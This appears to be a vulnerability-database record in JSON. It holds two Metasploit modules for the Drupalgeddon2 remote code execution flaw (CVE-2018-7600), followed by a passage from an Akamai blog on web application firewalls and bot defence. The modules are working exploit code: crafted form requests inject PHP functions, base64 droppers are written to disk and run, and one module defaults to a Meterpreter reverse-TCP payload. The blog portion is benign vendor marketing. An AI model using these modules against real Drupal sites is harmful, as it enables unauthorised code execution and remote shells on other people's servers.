end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: 
This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n 
send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 
'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today 
[2018-04-26] #", "sourceHref": "https://0day.today/exploit/30268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-18T03:54:57", "description": "Exploit for php platform in category remote exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30199", "href": "https://0day.today/exploit/description/30199", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 
'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2020-09-09T13:53:38", "description": "SQL injections were first discovered in 1998, and over 20 years later, they remain an unsolved challenge and an ongoing threat for every web application and API. 
The Open Web Application Security Project (OWASP) highlighted injection flaws in its Top 10 lists for both [web application security risks](<https://owasp.org/www-project-top-ten/>) and [API security threats](<https://owasp.org/www-project-api-security/>). \n\nFor Akamai customers, SQL injections comprised 76% of all web application attacks detected over the past two years.\n\nThe reasons why SQL injections remain a challenge in 2020 are the same as those that have driven the growth of the World Wide Web ([and Akamai with it](<https://www.streamingmediablog.com/2020/08/akamai-milestone.html>)) over the past two decades:\n\n * There is more information online than ever before, including [information that has financial value](<https://content.akamai.com/PG2564-Weighing-Risk-Against-Data-Breach.html>), and is therefore a target for attackers\n * The number of web applications is rapidly growing, and Akamai customers often have hundreds of applications that collectively represent their digital experience\n * Web applications have become highly complex, with many different components and technologies; the first-party and open source code in apps pose growing vulnerabilities, as do the many connections between services -- all of which can be exploited at any weak point\n * Developers don't always think about security, and security teams aren't able to keep up with the increasing number of complex applications they're chartered to protect\n\nAll of these factors contribute to security teams having difficulty keeping security up to date in constantly changing apps. But that's only half of the equation. 
Rapid iteration also creates a steady stream of possible new vulnerabilities and attack vectors designed to exploit them.\n\n### DDoS Protection Starts with Zero-Second Mitigation\n\nMost customers start their [web application and API protection (WAAP)](<https://www.gartner.com/en/documents/3903064/defining-cloud-web-application-and-api-protection-servic>) journey with distributed denial-of-service (DDoS) protection. After all, applications need to be available before there's any worry about a data breach.\n\n[](<https://blogs.akamai.com/DDoSBlog1-thumb-700x505-10718.jpg>)\n\nFrom [Operation Ababil](<https://www.akamai.com/us/en/about/news/press/2013-press/akamai-third-quarter-2012-state-of-the-internet-report.jsp>) to [Memcached](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/soti-summer-2018-web-attack-report.pdf?mkt_tok=eyJpIjoiTm1JeU56SmhaVEV5TkRWaSIsInQiOiI2MVlld2w4NHBSSHJ5SGFVU2I2Y3hLZkxyREFYaEdZdmpBSGh6TjVOVk40eG1CRlZRbFlNNWpKNUVQOU0wRGdhNnVOSW02SUVnSnNmUmZHM0VPRG5BMHNUNGV2bnFZbEhielNYTzFaRlwvQlQxMEFHNzQrWlhHc1hJVTVzbk55ZXgifQ%3D%3D>), the common thread between Akamai's DDoS mitigation services has always been instant mitigation for attacks, backed by an industry-leading zero-second time-to-mitigate service-level agreement (SLA). From the beginning, Akamai designed its CDN as a reverse HTTP/S proxy that instantly drops all network-layer attacks, which make up the vast majority of all DDoS attacks. \n\nLikewise, our authoritative DNS service drops all traffic that is not on port 53 in zero seconds. [Prolexic Routed](<https://www.akamai.com/us/en/products/security/prolexic-solutions.jsp>) introduced a similar capability in 2013, with [proactive mitigation controls](<https://www.akamai.com/us/en/multimedia/documents/white-paper/proactive-ddos-mitigation-with-prolexic-mitigation-controls-whitepaper.pdf>) tailored to each customer's network profile. 
Prolexic Routed was also responsible for mitigating the record-setting [1.3 Tbps Memcached attack in February 2018](<https://blogs.akamai.com/2018/03/memcached-fueled-13-tbps-attacks.html>) and [809 Mpps attack in June 2020](<https://blogs.akamai.com/2020/06/largest-ever-recorded-packet-per-secondbased-ddos-attack-mitigated-by-akamai.html>).\n\nThe ability to mitigate even the largest attacks in zero seconds is unique in the industry. Starting with proactive mitigation provides the fastest and most effective method for mitigating the majority of DDoS attacks -- without any additional analysis required. This is especially critical with the DDoS landscape of 2020, where short \"hit and run\" attacks and [large-scale attacks comprising multiple attack vectors](<https://blogs.akamai.com/security/index2.html>) are increasing in prevalence. \n\nBoth of these trends increase the challenges of analyzing attack behavior and applying appropriate mitigation controls quickly. Defining and dropping abnormal traffic upfront provides a better experience for customers and allows Akamai's Security Operations Command Center (SOCC) staff to focus on attacks that require manual analysis and mitigation.\n\n### Demand More from Your WAF\n\nWeb application attacks such as SQL injection pose very different challenges. How do you protect all of your web applications when a) you don't have enough application security staff or expertise and b) the applications themselves are constantly growing and changing? \n\nThe following principles have guided Akamai's web application firewall (WAF) development since 2009, when we introduced the industry's first edge WAF:\n\n * **Reduce the number of things that require management.** \nMoving to an edge-based deployment model allows you to manage your global WAF configuration with a single interface, instead of having to configure dozens of appliances with every rule change.\n * **Look for anomalies, not Common Vulnerabilities and Exposures (CVEs). 
** \nA CVE-based approach to WAF rules is unwieldy to manage and never gets ahead of the problem. Architecting the WAF around an anomaly scoring engine makes it easier to scale and has been [proven effective against some zero-day vulnerabilities](<https://blogs.akamai.com/sitr/2018/08/-attack-status-apache-struts-vulnerability-cve-2018-11776.html>).\n * **Curate WAF rules for customers.** \nThe most recent [Forrester Wave report on WAFs](<https://www.akamai.com/us/en/campaign/assets/reports/forrester-waf-wave-q1-2020.jsp>) gave high marks to Akamai's internal threat intelligence. Most organizations don't have enough security resources to manage a WAF over time. Akamai threat researchers help by continuously updating and testing WAF rules against live traffic to make enablement easier for customers.\n * **Leverage machine learning where it makes sense.** \nMost security teams won't trust an algorithm to update their WAF rules. Instead, Akamai uses machine learning to analyze live traffic (including 178 billion rule triggers a day) to identify anomalies requiring analysis by Akamai threat researchers.\n * **Automate as much as you can.** \nBecause of limited resources, most customers only protect their most critical applications, leaving many applications unprotected. Akamai developed [automated protections](<https://developer.akamai.com/blog/2018/10/10/quickly-protect-your-website-automatically-updated-waf-policies>) to protect the rest of the application footprint with a one-time click.\n * **Apply protection based on risk.** \nA reputation-based approach is a common example of protection-based risk. However, it is more effective to go beyond a simple binary score to provide a more accurate risk assessment. This can be done by creating [tailored risk scores based on attacker behavior against other customers and industries](<https://www.akamai.com/us/en/multimedia/documents/white-paper/5-phases-of-custom-risk-scoring.pdf>). 
In October, we'll be talking more about how to go beyond IP reputation and adapt WAF protections based on risk -- [stay tuned](<https://blogs.akamai.com/>).\n\n### [](<https://blogs.akamai.com/waf_daily_attacks_2019-06-01_2020-05-31.jpg>)API Security for Agile Organizations \n\n\n[API security](<https://www.akamai.com/uk/en/solutions/performance/api-security.jsp>) provides an industry-wide lesson on the need to provide a bridge between security teams and developers. Akamai introduced a positive security model for API protection in 2017, allowing customers to define API endpoints with Akamai to drop abnormal traffic and apply web application firewall (WAF) inspection. However, this required security teams to have visibility into the APIs developers are creating, which has proven challenging for most organizations. To help bridge that gap, Akamai recommends that API security does the following:\n\n * **Automatically inspect all API traffic.** \nAkamai now [automatically inspects all XML and JSON traffic](<https://blogs.akamai.com/2019/03/automated-api-protection-with-wap.html>) for web application attacks without requiring APIs to be defined and registered with Akamai. \n\n * **Automatically discover new API endpoints.** \nIn October, we'll be talking about an exciting new capability that will finally allow security teams to keep up with changing APIs by discovering API endpoints and their definitions -- integrated with WAF protections. Stay tuned and check [our blog](<https://blogs.akamai.com/>) for updates.\n\n### Detecting 12 Billion Bot Requests Daily \n\n\nUnlike DDoS and web application attacks, where attacks can often be identified based on traffic volume or signature, bot attacks have always attempted to blend with human traffic to go undetected. In addition, the more sophisticated bot operators continuously evolve in their attempts to evade detections. \n\nThis has driven a major shift in how the industry has approached the problem. 
Akamai recommends the following practices:\n\n * **Leverage signature-based rules.** \nBasic bot detection looks like a WAF, with rules based on bot signatures. These basic detections can still easily detect \"dumb bots\" comprising more than 50% of bot traffic, allowing advanced detections to focus on more sophisticated bots.\n * **Look for anomalies, not attacks. ** \nAs bots continue to better mimic human behavior, identifying sophisticated bots requires dropping all preconceived notions of what a bot may look like. Instead, machine learning algorithms such as [adaptive anomaly clustering](<https://blogs.akamai.com/2019/03/bot-manager-staying-ahead-of-the-bot-landscape.html>) look for anomalies in traffic and signals collected from the 1.3 billion devices that Akamai sees daily. \n\n * **Trust machine learning findings that review a lot of data. ** \nDetecting bots requires an algorithmic approach to correlating signals across different applications and customers in real time. However, machine learning requires lots of data to ensure accuracy. Akamai feeds signals from unmatched volumes of first-party data -- 1.3 billion unique clients per day and hundreds of Tbps of traffic -- into our machine learning algorithms to detect 12 billion bot requests and 280 million bot logins every day.\n * **Manage, don't mitigate.** \nWhile bots may be easy to block, bot management remains a cat-and-mouse game between attackers and security vendors. Unlike traditional tools, Akamai's inline architecture provides a wide array of response options to help manage the long-term impacts of bots.\n\n### The Newest Frontier: In-Browser Threats \n\n\n[Magecart-style attacks](<https://blogs.akamai.com/sitr/2018/11/an-introduction-to-magecart.html>) started hitting the mainstream in 2018, with major breaches at Ticketmaster, Newegg, and British Airways. These attacks are characterized by the ability to compromise scripts running on modern web pages. 
\n\nThese new types of attacks prove that new attack vectors will continue to be discovered as underlying applications continue to change. In response, security technology will continue to evolve as well. \n\nFor in-browser threats like Magecart, Akamai has shifted its approach again to:\n\n * **Protect in the browser, not in the application.** \nMagecart-style attacks occur in every client's browser, invisible to traditional security tools. Detecting and mitigating compromised scripts running in the browser require implementing [protection](<https://www.akamai.com/us/en/products/security/page-integrity-manager.jsp>) into the browser.\n * **Continuously monitor script behavior. ** \nSophisticated script attacks can be executed in a fraction of a second and gone before you notice them. Akamai's unique approach continuously monitors script behavior, allowing you to catch even transient threats.\n * **Look for anomalies even in legitimate scripts. ** \nWith malicious code injected into compromised scripts, in-browser threat protection must identify unusual changes in behavior even for well-known, legitimate scripts.\n\nFrom SQL injections to Magecart, the challenge of protecting web applications and APIs will continue to grow -- with new attack vectors to protect against as well as changing applications. Navigating the evolving threat landscape requires an expanding kit of tools, solutions, and vendors to reduce the risk of doing business online. \n\n\n### Beyond WAAP: Enterprise and Carrier Security\n\nWhile often the most high-profile targets, data breaches are not limited to web applications. 
[Gartner's secure access service edge (SASE)](<https://blogs.akamai.com/2019/11/security-at-the-edge-what-is-gartners-sase-why-does-it-matter.html>) provides organizations with a broader framework through which to think through your security approach, including [secure web gateway (SWG)](<https://blogs.akamai.com/2020/03/akamai-enhances-enterprise-threat-protector-to-add-secure-web-gateway-capabilities.html>), [Zero Trust Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>), and [DNS security](<https://www.akamai.com/us/en/solutions/security/dns-security-services.jsp>). Every organization should evaluate their full needs and map to different approaches as well as potential solutions. For more information on these markets and more, please see:\n\n * [2019 Gartner Magic Quadrant for Web Application Firewalls](<https://www.akamai.com/us/en/campaign/assets/reports/2019-gartner-magic-quadrant-for-web-application-firewalls.jsp>)\n * [2019 Gartner Critical Capabilities for Web Application Firewall Services](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-waf-critical-capabilities-report-2019.jsp>)\n * [Forrester Wave\u2122: Ze